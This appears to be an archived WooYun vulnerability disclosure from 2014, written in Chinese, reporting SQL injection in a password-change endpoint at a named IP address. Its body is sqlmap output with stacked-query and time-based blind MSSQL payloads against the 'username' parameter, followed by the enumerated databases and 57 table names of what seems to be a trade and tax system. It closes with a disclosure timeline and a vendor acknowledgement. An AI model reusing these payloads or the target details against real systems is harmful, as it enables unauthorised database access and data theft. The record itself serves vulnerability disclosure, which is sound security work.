乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-03: 细节已通知厂商并且等待厂商处理中 2014-03-03: 厂商已经确认,细节仅向厂商公开 2014-03-13: 细节向核心白帽子及相关领域专家公开 2014-03-23: 细节向普通白帽子公开 2014-04-02: 细节向实习白帽子公开 2014-04-17: 细节向公众公开
RRT
http://125.88.6.155:80/coms_wh/updatepword.jsp (POST)username=&oldpasswd=&newpasswd=&snewpasswd=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: username Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: username='; WAITFOR DELAY '0:0:5'--&oldpasswd=&newpasswd=&snewpasswd= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: username=' WAITFOR DELAY '0:0:5'--&oldpasswd=&newpasswd=&snewpasswd=---web server operating system: Windowsweb application technology: Servlet 2.4, Apache 2.2.21, Tomcat 4.2.3.back-end DBMS: Microsoft SQL Server 2005available databases [9]:[*] coms[*] coms_wh[*] dbczsie[*] master[*] model[*] msdb[*] nhbpm[*] nhzb[*] tempdb
Database: coms_wh[57 tables]+--------------------------------+| AIRPLANE_INFO || BALANCE_TAX || COMPANY || COUNTRY || DEPOT_BILLS || DISTRICT || ELE_BOOK || EXPORT_BILLS || EXPORT_EXCHANGE_BILLS || EXPORT_GOODS || EXPORT_GOODS_SHIPPER || EXPORT_PRICE_BILLS || FAHUO_BILLS || FAHUO_LIST || FETCH_BILLS || FETCH_GOODS || IMPORT_BILLS || IMPORT_GOODS || LET_DAT_ZBZL || LEVYMODE || LEVYTYPE || SA_PRIVILEGE || SA_ROLE || SA_ROLE_PRIVILEGE || SA_ROLE_USER || SA_USER || SPECIAL_PROCESS || TAX_BILLS || TAX_DERATE_BILLS || TAX_DERATE_GOODS || TRADE || TRANSAC || TRANSF || TRANSPORTER_INFO || T_SM_KEYTABLE || UM_DEPT || UM_DEPT_USER || UM_PRIVILEGE || UM_ROLE || UM_ROLE_PRIVILEGE || UM_ROLE_USER || UM_USER || USER_TO || V_BALANCE_TAX || V_IMPORT_BILL_MONTH_REPORT || V_IMPORT_GOODS || INVOICE\x05 || V_EXPORT_BILL_MONTH_REPORT\x02 || WARE_HOUSE\t || complex || daoruqd || dtproperties || invoice_fee_detail || invoice_info || mail_proper || v_ware_house_account_book || 结果 |+--------------------------------+
危害等级:中
漏洞Rank:10
确认时间:2014-03-03 12:39
谢谢,正在抓紧修复~
暂无